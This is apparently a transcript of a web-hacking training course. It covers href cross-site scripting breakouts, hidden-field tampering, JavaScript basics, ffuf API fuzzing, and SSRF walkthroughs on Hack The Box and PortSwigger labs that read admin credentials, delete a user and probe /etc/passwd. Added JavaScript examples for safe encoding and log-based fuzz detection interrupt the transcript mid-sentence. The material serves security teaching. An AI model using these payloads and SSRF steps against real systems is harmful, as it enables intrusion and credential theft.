to see if your information is getting stored in here, like this cross-site scripting. You should always come in here and look for the cross-site scripting or your keyword that you were able to put into the input. So I want to just show you how to break out of this for cross-site scripting. Let's say we're able to add a parameter and it adds it into this google.com. The most recent one that I saw, it was actually appending what I put in as a parameter down inside of a page one. It was something like this, page one equals, and this was at the foot of the application, so it would look something like this right here. If we save this, comment that out, and then we come back over here and we refresh this, it was down here at the bottom and it was like page one, and within this page one it had my little cross-site scripting payload that I was adding in right here. So we'll pretend that is what we have going on: that we're able to add in a parameter and it's getting stored right here, and we need to break out of this in order to get our cross-site scripting to work, because if you just come in here and type in script alert and then you close this out, nothing is going to happen. I'll show you, we might even get an error. We come over here, we refresh it, and nothing happens. You click on it, nothing happens. We're not able to, because what's going on right now is we're not breaking out of the current HTML.

There's a couple of different ways to go about this, and this is all going to be trial and error. Sometimes when I come across something like this in the wild, I'll just copy this and I will paste it into a text editor just like this, because the colors are going to change when the payload is ready to work, so you should be aware of copying this and bringing it into a code sandbox or some kind of text editor to play around with it. But I think this one is going to be pretty easy to break out of. You just add in some quotations right here in order to close this out, and then you can add a closing tag, and now if we save this and we come over here and we refresh the page, we get our cross-site scripting to work.

They really are this easy to find in the wild, especially if you're off the beaten path where payloads have not been tested and people haven't been looking for cross-site scriptings like this. The one that I found really was this simple. All I had to do was come up here into the URL and I just added in a random parameter, so you can just add in, for the sake of example, a CB, like a cache buster, even though we're not doing web cache poisoning, and then you can just add in a parameter of payload, and then we would say equals. The way you would get this to store is you would type in our script that we put in, just like this, in order to close off this anchor tag, and then we just add in our payload. So you'd go like this and you'd say script, script, spell it right, script, and then we would have alert, and then we would close off our payload just like this, and then you submit this. This is how it worked for me, and this right here was getting stored inside of the href just like this. So that is one way to pull off a cross-site scripting inside of an anchor tag.

Sometimes you'll see these inside of something like this, because if you're familiar with Burp and you see the header tags, it sends a referrer header showing where you came from in order to get to the next page. It'll have in it the previous website that you've come from, and I actually came across a website that was storing the previous URL inside the HTML in a hidden input field, and all I had to do was copy it and then basically do the exact same thing we were doing earlier and just add in our script just like this in order to get the alert to work. So you can look out for these in a lot of different places, such as a link, such as an href, or inside of a source, and just be aware that where you put things within the input may get stored randomly within the HTML, and then all you
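The href breakout described above, as an added example in JavaScript that is not code from the video: one render function concatenates a page1 parameter into an href the way the instructor describes, a second encodes the value so it cannot close the attribute, and the same encoding is applied to a hidden input holding the previous URL (Referer). Function names, the helper, and the sample URL are this example's own assumptions.

```javascript
// Added example, not code from the video: the page1 parameter lands inside an
// href; one render function concatenates it raw, the other encodes it.
// Function names and the sample URL are this example's own assumptions.

// Minimal HTML attribute encoder: these characters can end an attribute
// value, start a new tag, or begin an entity.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Vulnerable: the parameter is dropped straight into the href, so a value
// beginning with a double quote and a closing bracket ends the anchor tag
// and whatever follows is parsed as new HTML.
function renderLinkUnsafe(page1) {
  return '<a href="https://www.google.com/?page1=' + page1 + '">Google</a>';
}

// Hardened: percent-encode the value as a query component (no quotes or
// angle brackets survive), then attribute-encode the finished URL.
function renderLinkSafe(page1) {
  const url = "https://www.google.com/?page1=" + encodeURIComponent(page1);
  return '<a href="' + escapeAttr(url) + '">Google</a>';
}

// Same rule for the hidden input that stores the previous URL (Referer):
// the value is attribute-encoded before it is written into the field.
function renderHiddenReferer(referer) {
  return '<input type="hidden" name="ref" value="' + escapeAttr(referer) + '">';
}

// Review helper: count tag openers ('<' followed by a letter or '/') in a
// rendered fragment. One anchor should yield exactly 2 (<a ...> and </a>),
// one hidden input exactly 1; anything more means the value broke out.
function countTagOpeners(html) {
  return (html.match(/<[a-zA-Z\/]/g) || []).length;
}

// Render one input through both functions and report the opener counts,
// so the difference between raw and encoded output is visible at a glance.
function compareRenderers(input) {
  return {
    unsafeOpeners: countTagOpeners(renderLinkUnsafe(input)),
    safeOpeners: countTagOpeners(renderLinkSafe(input)),
  };
}

// Stand-alone demo with the constructed payload shown in the video.
console.log(compareRenderers('"><script>alert(1)</script>'));
```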
have to do is be familiar with HTML, such as closing off the quotes and then closing off the tag and then pulling off the cross-site scripting. So with that, we're going to move on and look at some more HTML in the next video.

Alright, so there's two things I really want to show you before we move on from HTML and we take just a second to look at CSS and then we move into JavaScript, and that is hidden information as well as forms. So we'll just start out with forms, and it will naturally lead into the hidden elements. A form is pretty much just what it sounds like. It is one of those things that usually includes inputs and information that you're going to be taking in from the user. So usually within a form you'll have a class, which we're actually not going to mess with until we get to the CSS, and then you'll have some kind of action typically, and this is going to take you somewhere, and we're not going to mess with that really either, and then we're going to also see a method, which we're not going to mess with as well. This is what would be sending the information to the server, okay. And now we're going to want to add in a label just like this, and inside of this label we're going to delete that and we're just going to say your name. So we have this your name right here, so if we save it and we come over to our page and refresh, you will see it pop up on our page. I added in this little hr so you could see the division of the information, and right here is the your name. So we have our label, and now we want to take an input, so what we will do is add in an input. We just say input, just like this, and it's going to be a type text, and we're not going to mess with the ID or the name at this point. If we save this, you're going to see just a box up here, over here, and so it says your name, and then we have this text box. We're going to end up adding a button as well, so we will say we want a button, and it's just going to say submit, even though our button at this point is not going to do anything. We can save this and refresh, and now we have your name with this text box and a submit button that does nothing.

Then lastly, you're going to see within these forms a password, and you're going to see something like another input just like this, and instead of the type text you're going to see a password. If you save this and we come back over to our page and we look at this... actually, we're going to go ahead and add in a break because we want this on a new line. So we save this, we refresh it, and that's pretty ugly, and you'll see we have these little hidden dots just like here. This is to secure the password, and you'll see these a lot on web applications, but now they've started adding in this little eye over here for you to be able to see what you're typing in, because if you know any HTML and CSS at all, you know that you can just right click this and you can inspect, and then you can come in here and just change this password to text and then look at it just like this, and you can see the information that is being typed in here. This is why people, when they use public computers, should never save their password, because if you use a public computer and you log in and you accidentally hit save password, then the next user can come in here and repopulate the password and look at your email and password and have your information, which would be very bad. So don't use public computers to enter in literally any of your data that is important to you.

So there's one more thing I want to show you, and that is the hidden option. We're going to actually use a div here, and I want to show you that you can just type in hidden right here. Usually this hidden will be something other than the actual word hidden; there's other ways to hide elements within HTML, but we're going to use hidden because it's really simple. Then sometimes you'll see something like ID equals eight, and then if we save this you... I've never actually seen this in the wild, only in CTFs, so this is not going to be something you're probably going to encounter in the wild, but you will probably see it in CTFs, as I've seen it in several CTFs. You come over here and you refresh this page, you can see that we have this div id8 and it's hidden, and we can unhide this by just deleting the word hidden, and now the ID shows up on the actual page. Usually within CTFs this id8 will be within a form, and you would just change this 8 to something else. So you could come down here and say we're going to change the ID to 1, which would typically be an admin, and then you would hit the submit form and it would change your ID to one. That's usually how it'll work in CTFs. I've never actually seen this in the wild, but it is something to be aware of, that you can change this hidden to anything, you can just delete it, and then you can change things within forms that have been hidden quite simply just by changing it. So that is something else to be aware of within the world of HTML and CSS.

All right, so we have a future edit here, and I just want to say the reason that this would work in most CTFs is because if there is no JavaScript to check the user ID input, then when you hit the submit button it would go ahead and send it. But in most cases there's going to be JavaScript to check such functions, so a lot of times this is not going to work, and we will cover this more in the future. But for now, I have seen this in CTFs where you can change an ID because there's no JavaScript checking to make sure that the user client side input is what it is supposed to be.

In the next video we're going to give just a quick look at CSS, because we're not trying to be web app developers. I'm not going to spend a lot of time on CSS, just going to give you a quick overview so that you know what it is, and when you see it you'll be able to recognize it and know that it really isn't anything important to you unless you are crazy good and you can pull off some kind of remote code execution through
a CSS injection, which can happen but is really advanced. So we're going to just look at some simple, basic CSS so that you are aware of what it is and you are questioning when you see it inside of some source code. I'll see you in the next video.

All right, we're going to have a look at some CSS. We're not going to spend a ton of time working on our little website here making it look nice. For me, I am not a designer, and I don't understand web design and fashion or anything like that, or color coordinating, so in the world of web development this is, for me, the most difficult part: making a website look nice. Some people are just gifted as designers and I am not one of them. So I'm just going to show you how CSS works in two different ways. I'm going to show you internal CSS and I'm going to show you external CSS, so that way when you come across CSS you know what you are looking at and you're familiar with it. I'm not going to actually show you how to design a web app, because that is not my area of expertise and it's not my gifting.

If we want to do some internal styling, we can just come in here and type in style, and we can hit enter, and then we have this h1 right here that has our name in it. So we could just very easily type in h1, and then we open a set of curly braces, and then we can just type in color, and then we can just type in aqua, looks like a great color, and then we close it off with our little colon there, and we save it, and we come over and refresh our page. Uh, I see, I didn't type in h1, I typed in hr. So we type in our h1, save it, refresh, and our color changes to blue. Then maybe we want to change the word right here, hacker. There's another way you can go around doing internal styling: you can just come in here and say that you want a color, and then we say we want pink, and then we can save it this way, and then if we refresh it our color works. So there's several different ways you're going to see internal CSS, and this right here is the most common. This happens, but it doesn't happen very often, so when you're out in the wild you will see CSS function like this.

You can also do a lot more with this. We're not going to cover it, so you could come in here to this h1 and you can type in something like padding, and you can say padding left, and then we could say like 200 pixels, and then if we were to save this and come back over and refresh it, you'll see that the name moved. I'm not sure if there is a centered option. Let's check it out. There is not. So there's something called Bootstrap that would really help you with your styling if you were trying to become an actual developer, but we're not going to spend a ton of time with that. So you can do things like the padding left. You could do a padding for the bottom if we wanted some space between our information here, and you could say 100 pixels, and you could save this, and if you came over here and refreshed it, we'll get a padding over here. So this is a little bit of styling.

One thing to be familiar with is a lot of times things are going to be broken up into divs, so you would have something like this right here. You would have a div, and we'll just copy this and cut, and we can paste that right here, and then we'll put another one, we'll put this right here, and then we'll put one down here between our list that we have right here. Then if we were to put something inside of here, like we say this div we want to style it, and we say style, and then we want color, and then we're going to make this entire color red, it's going to be very bold, and then we decided to make a different div and we wanted the entire color to be, let's say we'll make this entire color pink, and we save this and we refresh our page, you're going to see that everything within those divs actually changes colors, except this overwrites what was written inside the div. So we can actually just go ahead and close this out right here, and now if we come back and refresh you can see everything becomes red and pink within the specific div. So this is an introduction to internal CSS. You can style it either up here like this, or you can do some internal CSS, and so the divs are going to be like... within HTML and CSS you can think of everything as being inside little boxes, and there's actually a Chrome extension, it'll actually show you all of the boxes, and it's called Pesticide, and you can install it if you want. I'm not going to show it, because the point of our course is not to learn how to be designers; the point is for us to understand CSS well enough to know what we're looking at, so that we can figure out how we can exploit web applications when we come across it. So with that, in the next video we're going to look at external CSS.

Okay, in this video we're going to look at an external style sheet, and then I'm going to show you why this was important for you to learn. So the first thing we're going to do is we can just go ahead and delete these inline styles that we put in right here, so that way we have our blank page like we did before, and we can just go ahead and delete the style altogether, and then if we save this and go back to our page and refresh, everything is back to how it was before. Now what we are going to do is come right here and we're going to add a folder, just like this, and we're going to call it CSS, and then inside this folder we're going to add a new page and we're going to call it style.css, and you can see our Visual Studio has recognized it as a style sheet. Come back to our index.html, and inside of the head tag up here we can type in link, and it tells us that it has this style sheet, and we have the href too, and we want to link our CSS style sheet just like this, and it auto saved for us, so we can now save it. Now you can come over to your style sheet, and if we wanted to do like we did before, we can type in the h1 and we can type in color and we can say red, and if we save this and come back over to our page and refresh this, our name is now red, because that
was the h1. We can do something like we did before with these divs, and we can say we want to give the div a color, so we could say div one we want to have a color of blue. So we can come in here, we put our period before the div, and this is going to tell it that this is going to be our keyword, and we can say color and we want blue, just like this, and then we'll make a div two, so we'll say period div two. I forgot this was div one, and we can say we want the color of pink. We'll go div one right here and we can say style div one, and I just realized that this is supposed to say class, because we've given it a class name over here, and then if we give our second div a class of div two and we save this and we come over here and refresh it, we now have... the colors have changed within our div and our name color has changed. So this would be a form of external CSS.

I want to show you why it was important for you to know this, and it's important to know that this file is named CSS and then we called it style.css. If we come back over here and we just check out this color palette, and we inspect the page, and then you come over here to the sources, you can actually click on this CSS right here. Yours might not be all in line like this. You can click on the CSS, click on the style page, and then click the pretty right here to make it look pretty, and you can see, just like this, what they have done. It is organized just like ours, so this would be an anchor tag which would be clickable, and they have red green blue, not sure what the a is, and then they have the text decoration none. So you can see their style sheet is called CSS, just like ours, and style.css, and then it is formatted exactly the same way, and this would be an external style sheet. Then if you come back to looking at the elements, you can see the class right here, the class names for how they decided to name their classes and organize what they look like based on the CSS. So now when you come in here and you inspect a page and you come across a CSS file, you'll know what you're looking at, and you'll also be familiar with seeing class inside of the divs, seeing these class names. That is going to wrap up for us the CSS, internal and external. I will see you in the next video.

Okay, we're going to be moving into a section on JavaScript, and so as we go through JavaScript it will be helpful for you to have a great place to practice your JavaScript. A really easy place to practice JavaScript is within the Chrome developer tools, so I would suggest, if you do not have Chrome installed, go ahead and install Chrome, because we're going to be using it throughout the portion of our JavaScript course. An easy way to practice JavaScript is just come over to your web app that we have running within Chrome. We can go to inspect, and then we will go to sources. You are going to be on this page right here. We're going to hit these two arrows right here and we're going to say Snippets, and then we'll say new snippet, and then you can just call this index.js, which is the file name within your code you would have it named over here, and then you can actually just type in your JavaScript right over here, and then when you're done you can run it just like this by hitting play, and it'll hit up an alert for us. Then if we want to do something like a console.log, and then we want to log something, it will actually pop open the console for us right down here and it will tell us what we have logged. So this is going to become more familiar with you as we are going along, but this is where we're going to be practicing our JavaScript.

If you're unfamiliar with JavaScript entirely, JavaScript is the scripting language of the internet, so if you were wanting to become a web application penetration tester or a bug bounty hunter, JavaScript is going to be something you're going to want to learn, because it is the language of the internet. It is what gives websites functionality, so when you go to a web application and you
see things moving around and stuff happening, that is going to be thanks to JavaScript. So JavaScript is going to be very important for us to learn, and we're going to spend quite a significant amount of time learning this JavaScript, so buckle up and get ready for JavaScript.

One thing that is important to know about JavaScript, and really any scripting language, is syntax. So you saw me type in alert just like this, and then we can type in the word hello, and then if we close this off, this is not going to work for us. We're actually going to get an error, and if we open up our console it tells us that we have an error right here. The reason is because these characters within this alert need to be inside quotations, because this is considered a string. So JavaScript wants to interpret whatever's inside of here either as integers, such as one two three, and this will run for us and it will work because these are integers, or you're going to need to have strings inside here. So if we type in some characters, we will need them inside of a string, and now if we run this it will work for us. So we have this alert right here. What is this alert? This alert is calling a function within JavaScript, and in the future we're going to make our own custom functions, but for now all you need to know is this alert is a function, and it is going to pop up the string of characters that are put within here, that are being passed within the function. Then I believe we need this within Chrome developer tools to close off our alert, and I guess we do not, but typically when you close something off you will close it off with a semicolon just like this, so it's best practice to go ahead and start putting it in there now as we are practicing. So with that, I will see you in the next lesson.

Before we make it too far into our JavaScript lesson, I think it's helpful to know there are several different data types, and we've already seen this one right here with a string. But if we pull open the console here, which is really great, it is going to be a very useful tool to us as we're learning our JavaScript, we can type in something called typeof, just like this, and then we can put whatever we want inside of our brackets right here, and we can say we want to put in one two three, and it tells us this is a number. If we put in a string right here like this, we don't have to type anything in, and it tells us this is a string. Then we also have one other data type that will be really helpful to us, especially when we're running while loops, and that is true, false, and it will tell us this is a Boolean. So you have strings, integers, and Booleans, and we're going to be using all of these as we move into our JavaScript, and it will be helpful for you to remember these. You're also going to see these within different exploit write-ups within the world of hacking, and so it's important to know that you have integers, strings, and Booleans, because you will come across these in the future, and if you ever do any kind of programming, or you're writing up the code for your own exploits or modifying exploits, you will need to know what is going on and what kind of data types you are dealing with. So with that, there is one more area of JavaScript that I want to cover before we start trying to write any kind of code or do any kind of exercises, and that is variables. So with that, we will check those out in the next video.

Okay, so here we are with our variables, and there's a couple different ways I want to show you how to use variables. The very first thing I want to tell you about variables is that it stores some information for you. A variable is going to store some kind of data that we can later come back and say we want this variable, what information is within it, and it will tell us the information that is in it. So for example, if I say var equals two plus three, and then we have to name our variable and we'll just call it num, so we have this var num equals two plus three. We need to close off our JavaScript here, two plus three, there we go, and get rid of that error. If we run this, it's going to tell us that we have nothing happening, because we need to console log this, so we go console.log and we're going to log the number. So this is our variable being passed through the console.log function, and if we run this we get the number five down here. So this number contains the information two plus three, which is going to be 5, and the console.log just prints the variable down here for us. So we have this right here, and when we run it we get our number.

But how can we take information from the user and use it? There is a function called the prompt, and if you're very familiar with cross-site scripting at this point, then you have for sure seen this in cross-site scripting payloads. A prompt is also another way to view a cross-site scripting, instead of an alert. So you can say prompt, and then we can pass in our information here that we want, and we can say, what is your name, question mark, and we can close this off, and if we run this it should give us this little alert here, and we can say Ryan, okay, and then it prints down here for us. But how do we get this information that we put in here? We need a variable. So if you want, you can go ahead and pause this video and see if you can figure out how to store this prompt in a variable called name and then get it to console log down here what our name is, or the information that we put into the prompt. You can go ahead and give this a try now.

Okay, this is a pretty simple challenge. All we're going to do is change this to a var name equals what is being put in the prompt, and then if we come down here we can console.log, and then we'll put up our brackets and we'll say name, just like this, and now if we run this we're going to get a prompt, and this time we're going to say Ryan J, okay, and it prints out for us Ryan J down here through our console log. I'm actually not entirely sure if it
will print anything if we don't put the console log. It does not, so the console log is necessary to be here for our name to be printed. So we can try this again, and we say name, and it prints name for us. Now there is another way to go about this without the console log, and we could type in, like our cross-site scripting that we are familiar with, and we can say hello, and then we can pass in the name function. So we should be able to type in hello plus name, and if we run this and we say Ryan, we get an alert saying hello Ryan. So this is how an alert would work with a console log. The space has to be put right here; that was my problem on why I couldn't get that to space. So we just say like that, hello space, and then name, and so now it should alert hello Ryan, just like that. Okay, so you just need this space in here to get the space in the alert. So this is a variable and a prompt, and so I want you to get used to looking at these types of variables and information. So just go ahead and play around, and maybe do some simple math stored in a variable, display in an alert, maybe do a couple console logs before going on to the next video, so that way you're familiar with variables and how they work.

Okay, so in this video we're going to cover the while loop, and in the next video we're going to cover the for loop. I decided to start with the while loop because it is quite a bit easier to understand, and we're going to just make a simple while loop and we're going to count to 100. So we can say i equals zero, and then we'll say while i is less than or equal to 100 we want it to do something, and we want to console.log i, so we'll go console.log and then we'll say i, so that way it prints the i for us. The next part is very important: we'll say i++, and this will add 1 to i every time, so the first time it runs it'll be 0, 1, 2, 3, 4, and so on until it reaches 100, and then it will stop. If you do not have the i++, you'll probably freeze your computer and have to force restart, so this is very important. So we can go ahead and run this, and it prints out for us; we have all of the numbers here for us, starting with zero. So this is the while loop. It runs a function, or whatever is inside of the while loop, until it has reached the total destination, and sometimes you can have a while loop running with taking user input, and when the user input says to quit you can shut the while loop off, but we're not going to go into that, because I don't think it's something you need to know in order to be an ethical hacker. With that, we will move into the for loop.

Okay, so the for loop is going to look a little more daunting and scary, but it really isn't once you understand how for loops work. So if you're coming from another programming language, for loops are really simple, but in JavaScript they're a little more difficult, because JavaScript is the language of the web; it's not made to run for loops in a simple manner like Python. So if we run a for loop, and we're just going to run a simple counter like we just saw, we can say something like for, and it's going to ask us do we want to run a for loop, and we're going to say yes, and it gives us the boilerplate for a for loop. So we'll just leave this index instead of i, and so we're just going to say that i equals 0, and as long as it is less than 100 we're going to go ahead and say i, or index in this case, plus plus, and then we can just console log this, and then we'll say index, just like this, and now if we run this we're going to get an output down here of counting to a specific number. So in the world of programming I almost always use for loops, I rarely use while loops, but I just wanted you to see these for loops and while loops so that you can read them when you're looking through JavaScript code for vulnerabilities.

I just want to show you how to enumerate APIs, because this is something that isn't covered in any courses or any certifications that I know of. So if you come into your terminal and you have an API like this, and you come in here and you type in like v1, or you're typing in basically anything, you're just trying to figure out how do you get further down the line, you're looking for endpoints. The tool I like to use for API fuzzing is ffuf. So it looks just like this, if I can get here, but there we go, and I actually ran this just to make sure it was going to work before I did the video. So I like to run ffuf, and then you give it the URL, and this is the API, and then we're going to be fuzzing for an endpoint, and then you give it a word list that you want to use. Gobuster and dirb and a lot of those, uh, your usual fuzzing tools just don't work with APIs, so I like ffuf because it does work. You run this, and you see it pulls down docs and API, so if you were to do this like in a live program, you'd come in here and you just type in API, and then it says we have v1, so you can just type in v1, and then you'll have user, and you can kind of see, if we wanted to look for more endpoints, we could just close out of this and we would just move our fuzzer over. So you would just go like this, and then it would fuzz right here, and it would look for more endpoints over on this point. So that's how fuzzing APIs works.

If you're interested, you can go ahead and do the box on Hack The Box. It's actually really simple. You just create a username using the API, so you'll use Burp, you'll just intercept the request, and it'll send you back a JSON of what you need, and then you can turn your request into a POST request and make a username and password and log in. So this is API fuzzing. You'll see these on bug bounty programs, and sometimes you'll come across them in Hack The Box machines, but this is something that's not really covered, so I wanted to make a quick video on API fuzzing and, uh, bug bounty. So sometimes you can find an API URL like this, and you can just start fuzzing away and see what information you can come back with, and manipulating the requests. So that
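As an added defender-side example that is not from the video: detection logic over constructed web-server log lines that flags the kind of word-list run against an API prefix just described, which shows up as a single client producing many distinct not-found paths. The thresholds, field names and the sample log are this example's own assumptions.

```javascript
// Added defender-side example, not from the video: flag an ffuf-style
// word-list run against an API prefix in constructed access-log lines.
// Thresholds, field names and the sample log are this example's assumptions.

// Combined log format: ip ident user [time] "METHOD path PROTO" status bytes
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

// Parse one line into its fields; returns null for lines that do not match.
function parseLine(line) {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// A word-list run produces many distinct not-found paths from one client,
// while an ordinary client repeats a handful of real endpoints. Flag a
// client whose API requests are numerous, mostly 404 and mostly unique.
function findFuzzers(lines, options = {}) {
  const {
    prefix = "/api/",     // only requests under this path are counted
    minRequests = 10,     // fewer requests than this is never flagged
    minDistinct = 8,      // distinct paths needed (repeats of one URL do not count)
    min404Ratio = 0.8,    // share of 404 responses needed
  } = options;

  const perIp = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r || !r.path.startsWith(prefix)) continue;
    const s = perIp.get(r.ip) || { total: 0, notFound: 0, paths: new Set() };
    s.total += 1;
    if (r.status === 404) s.notFound += 1;
    s.paths.add(r.path);
    perIp.set(r.ip, s);
  }

  const flagged = [];
  for (const [ip, s] of perIp) {
    const ratio = s.notFound / s.total;
    if (s.total >= minRequests && s.paths.size >= minDistinct && ratio >= min404Ratio) {
      flagged.push({ ip, requests: s.total, notFound: s.notFound, distinctPaths: s.paths.size });
    }
  }
  return flagged;
}

// Constructed sample: 203.0.113.5 tries a short word list under /api/ and
// only "docs" and "v1" exist; 198.51.100.7 is a normal client calling
// /api/v1/user repeatedly. Both addresses are from documentation ranges.
const WORDS = ["docs", "v1", "admin", "users", "login", "config",
               "debug", "status", "health", "v2", "test", "backup"];
const SAMPLE_LOG = [];
WORDS.forEach((w, i) => {
  const status = (w === "docs" || w === "v1") ? 200 : 404;
  const sec = String(i).padStart(2, "0");
  SAMPLE_LOG.push(`203.0.113.5 - - [10/Oct/2023:13:55:${sec} +0000] "GET /api/${w} HTTP/1.1" ${status} 0`);
});
for (let i = 0; i < 6; i++) {
  SAMPLE_LOG.push(`198.51.100.7 - - [10/Oct/2023:13:56:0${i} +0000] "GET /api/v1/user HTTP/1.1" 200 512`);
}

// Stand-alone demo: prints the one flagged client from the sample log.
console.log(findFuzzers(SAMPLE_LOG));
```

Raising minDistinct catches slower runs that repeat paths, while the 404 ratio keeps a client that mostly hits real endpoints out of the list.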
is API fuzzing.

We're going to cover server-side request forgery. The purpose of this video is to show you what is going on inside of a server-side request forgery and walk through a couple of examples so maybe you can understand what is happening. So the way we're going to go about this is I'm going to show you a flowchart, and the flowchart might not make a whole lot of sense in the beginning, but I want to show it to you so that way you kind of see what is happening, and then we're going to walk through two different examples and then come back to the flowchart, and at that point the server-side request forgery should make a lot of sense to you, and you should be able to start looking for these bugs as you are browsing through programs, and you'll be able to submit a proof of concept that makes sense to the person who receives your bug report. With that, let's jump into it.

All right, here we are with a very simple, basic flowchart. I tried to make it as simple as possible so that you guys could understand exactly what's going on and that it wouldn't be too busy with too much going on. So this would be us, the user, and you could also change this to the hacker or the attacker, and so the attacker sends a URL request to the website, so we're manipulating the URL, and then the website makes this request, that you weren't supposed to be able to make, to the server, and then the server sends the data back to the website, and then you can view it as the attacker. So this is how the flow works. If you were just a regular user we would just have user here, and you would send a request, and it's just like any request that's going to the website, and the website would pull the information from the server and the data would be sent back to the website, and you would see the request that the website made to the server. The problem with the server-side request forgery comes in when you have the ability to manipulate this URL request. So let's say the URL wants to reach back to the home or root directory and you're
able to grab a file off of the server instead of the actual directory right here. So with that, we're going to go ahead and move into an example. We are going to be using this example from Love on Hack The Box. I'm not going to walk through all of the recon and what gets you to this point, but rather just what is going on with the URL. So in here we have the web application that's going to reach out to the server through this URL form right here, and if you're ever doing a CTF or any kind of certification and you see something like this, this is a dead giveaway that there is a server-side request forgery: any time you see a URL right here. But most of the time the URL is going to look like this up here, and you're going to have something like this, and then it will pass in a parameter like url= and then it'll have a file right here, such as the root directory or some kind of file. So we could just put in here some file, and then what you would do is you would manipulate this right here and you could pull down files a different way. But instead of having it right here inside of the URL, this web application has it right here, and because this is an easy box on Hack The Box that's probably the reason they put the URL request down here in a submit form instead of being in the URL where you have to deal with it inside of Burp. So this is how you're normally going to see it: it'll be up here in the URL, something like this. And in the next example we're going to see it's also not going to be up here, but it's going to submit a URL request and we'll be able to see it in Burp and we'll be able to manipulate it just like we would up here, only we're going to do it in Burp. So inside of this file scanner right here on this Hack The Box machine, if you ever want to test a server-side request forgery it's pretty simple: you can just come over here to a terminal and you can set up a netcat listener on port 80, and it needs to be on port 80 because it's going to have to go through the HTTP protocol. Over
here you just type in something like http:// and right here this is my VPN IP with Hack The Box, and so we can hit scan file, it's going to hang for a second, we can cancel it, or you can just come over here and cancel out of this, and you can see that it reached out to my little netcat listener here on port 80. And so we know that this is trying to grab a URL, and you can check to see if it's grabbing a file from the server by typing in the actual IP address. So in this case, for this Hack The Box machine, the IP address is http:// and it's 10.10.10.239, just like this, and if we scan this it's actually going to bring back the web page right here. So if we went to this IP address right here, we said http:// and then we said 10.10.10.239, and then we come here, you'll see this voting system right here; this is also on this server, so I actually had to add this to the /etc/hosts file, and if you're not familiar with what that is, that's okay. So because we're able to pull down this voting system by pointing this machine to itself, we know that we are able to pull information from the server, and I want to show you why this is so bad and such a detrimental vulnerability, because if I were to come in here and we scanned and we searched through all these files, like you would in order to get remote code execution on this box, you can grab files off of this server, and in the case of this specific box on Hack The Box you're able to grab a password file. So you would have to go through and scan the network, but just to show you, we're not going to do that, we can grab... so this is the localhost and it's on port 5000, and we can hit scan file. I was missing this dot here; we can hit scan file and it's going to pull this information from the server, and it's going to tell us that you have the credentials for admin right here. So this would probably be the admin and then you have the password right here. So this is why server-side request forgery is so bad: you can pull information that you shouldn't be able to
access from the server. So we're going to move on to PortSwigger right here, and they have a basic SSRF against a local server. It's going to tell us, to solve this lab, we're going to change the URL, access the admin interface at this location, and we're going to delete this user right here. So let's open up the lab, and the way we're going to go about solving this is... I forgot where it told us this is located; I think it said inside of a check the stock feature. So if you come over here and we open up Burp we can turn... actually we need to be inside here. Now we can turn intercept on, and we can check the stock, and we'll send this to Repeater, and then we can just turn this off. Okay, before we change any of this we're going to send this to Repeater so you can see what we get back. This is the normal request, this is what we get back; we get back a response of OK. But if we just delete this whole thing right here and we paste in the localhost and then we go to /admin and we send this, we're going to get back a different page, and we're actually told that we've reached the basic SSRF against the local server, and I think we're supposed to actually delete the user carlos right here. And so the way we would go about doing this... actually, before we delete him, I want to try something just because I just showed it: we can go 127.0.0.1 and this should send us to the localhost as well. See if we get back the same thing, and we did. So this is what we would do: you can type in localhost right here or 127.0.0.1, and then we're on the admin page. Now what we need to do is delete the user carlos, and I'm guessing this is supposed to be done from the admin panel. I suppose you could read through here and maybe it might tell us what we can do from the admin panel. Oh, it tells us right here, it says we need to delete the user carlos. You can actually just copy this right here; look, it says we can delete these users, it actually tells us we can delete a bunch of users, and we can paste this in here, um,
we got too many admins going on; we can delete that all the way back. Now if we hit delete, this right here should pop up to solved. So if we send this it tells us not found; I think we have to follow the redirect. Turn the proxy off, and it tells us that we have deleted the user carlos. So this is how a server-side request forgery works, and I want to walk you through this one more time. So now I want to bring you back to this flowchart right here, and now you understand what we're doing: we are the user and we make a request through the URL, through something like this, and let's say we want to get a file. You would do this right here, and if you were on a Linux machine it would look something like this, and you could try and pull down the /etc/passwd file. I'm actually not sure if there's supposed to be a colon there or not, so you can Google and check that, I can't remember, but it would be something like this to pull down the /etc/passwd file, and on Windows you're going to be trying to pull down some kind of Windows system file that would just be on the server, to see if you can get files. But you wouldn't do this necessarily in a proof of concept; what you're going to do is, like I showed over here, open up a netcat listener and then make a request to the URL, which is going to be your own IP address right here, to see if you get a connection back. A quick tip if you're trying to figure out what the server is, if it's Linux or Windows, and you want to know what kind of file to look for: you can actually just ping the server, and see, the Hack The Box machine is a Windows server, and it's .239. Whenever you see this TTL of 127 or 128 or something in the 120s it's going to be a Windows server, and when you ping a Linux server it's going to be somewhere in the 65 range, and that's one way to tell what kind of server you're going up against. You can just really simply ping it, or you can run an nmap scan and it will tell you. But this is server-side request forgery in a
nutshell: you're the user and you make a request through the URL to the website, and then the website requests the URL from the server, and the server sends the data back to the website, and then you're able to view it as the user, and if you are able to manipulate the URL request to the server you can grab files from the server that you shouldn't be able to access.

Okay, so before we move on from server-side request forgery I really wanted to show you one more thing that you might come up against in the future. So we're here on Forge from Hack The Box, and you have this upload from URL, and I'm not entirely sure how it's going out and grabbing the URL or an image from the URL, because this is apparently a gallery website and you can post images to the website. So we have upload an image: you can upload through the browse, like this, or you can upload from a URL, so I imagine it's doing some kind of wget or something like that, and we know that we are on a Linux box, so you can try and do some stuff here. We'll just ping it real quick, so if we ping the IP address you can see the TTL is 63, so that tells us we are on a Linux box. And so if you wanted to you could do something like file:// and then we would go /etc/passwd, and we can try and pull this down, and it tells us that we're not allowed to do this. So we're on a Linux box, we're not allowed to grab files directly from the server this way, so I'm going to put this in Burp and we'll play with it in there. And we know that the URL is working, because if we come out here and we set up our netcat listener like we have been doing, and we put in our IP address, which I have up here, which is 10.10.14.6, just like this, and when you hit that it's hanging, and we see it reach out to our box right here; we can close out of that. So we know the URL is working, now we just need to figure out how to get the SSRF to work. So we can come back over here, we'll put this in Burp and then we'll
